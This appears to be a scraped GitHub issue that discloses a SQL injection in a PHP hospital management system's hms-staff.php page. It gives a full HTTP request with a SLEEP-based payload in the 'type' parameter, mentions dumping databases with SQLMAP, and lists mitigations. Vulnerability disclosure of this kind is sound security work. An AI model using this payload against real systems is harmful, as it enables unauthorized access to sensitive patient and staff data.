I found a SQL injection vulnerability in your hospital management system.
Page Request:-
POST /hospital/hms-staff.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
Connection: close
email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP tool.
Affect URL: http://127.0.0.1/hms-staff.php
Afftect Parameter: type
Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-
Mitigation:
Performing Whitelist Input Validation
Use of Prepared Statements (with Parameterized Queries)
The text was updated successfully, but these errors were encountered:
aniketpr
changed the title
Vulnerability/BUG - SQL Injection on hms-staff.php page
Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page
Jun 6, 2022
Hi
I found a SQL injection vulnerability in your hospital management system.
Page Request:-
The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the
substr()method or using theSQLMAPtool.Affect URL:
http://127.0.0.1/hms-staff.phpAfftect Parameter:
typePayload:
admin+WHERE+1=1+AND+SLEEP(10)--+-Mitigation:
The text was updated successfully, but these errors were encountered: